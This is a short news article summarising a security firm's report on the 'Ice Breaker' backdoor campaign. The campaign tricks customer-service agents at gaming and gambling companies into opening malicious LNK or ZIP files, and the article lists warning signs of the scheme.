Experts Warn of ‘Ice Breaker’ Cyber attacks

On February 1, 2022, Israeli cyber security company Security Joes issued an article about the Ice Breaker virus. By the article, researchers observed that hackers have been targeting online gaming and gambling companies with backdoors named Ice breaker. The only publicly available proof that has been discovered of the Ice Breaker threat was a tweet from Malware Hunter Team in October, which is shown below .

The Ice breaker attack

In his article, Security Joes described the threat actor malware as Ice breaker APT which is cunning and wise. Ice Breaker is a human-operated customer service attack that hacks the platform using a backdoor. For the target to get prone to the attack, he/she must be convinced by the operator to open an LNK or ZIP file. In most cases, is housed on a bogus website imitating a reliable service.  It contains a command to download an MSI payload from the attacker’s server, install it without user interaction, and execute without a user interface.  The downloaded malware is “a highly complex compiled JavaScript File”.

Once the Ice Breaker backdoor has been installed on the target’s device, the attacker can initiate remote shell sessions, take screenshots of the victim’s computer, steal cookies, credentials, and arbitrary files, customize the threat by using plug-ins, and run custom VBS scripts on the compromised machine.

Indicators of the attack             

In this kind of hack, the visitor does not have an account on the targeted site yet they claim that they have trouble logging in. Another indicator is that the attacker sends a link to download the screenshot of the problem from an external website, rather than simply sending an image attachment. Although, the group behind these attacks remain unknown.

The conversations between Ice Breaker and support agents show that Ice Breaker is not a native English speaker and is purposefully requesting to talk with Spanish-speaking agents.

Delivering the backdoor

The threat actor contacts the target company’s customer service pretending to be a user having trouble signing in or enrolling with an online service to deploy the backdoor.

Hackers persuade the customer service representative to download a picture that more accurately explains the issue than they can. Although they have also seen it transmitted via Drop box storage, researchers claim the image is typically housed on a bogus website impersonating a reputable provider.

Leave a Comment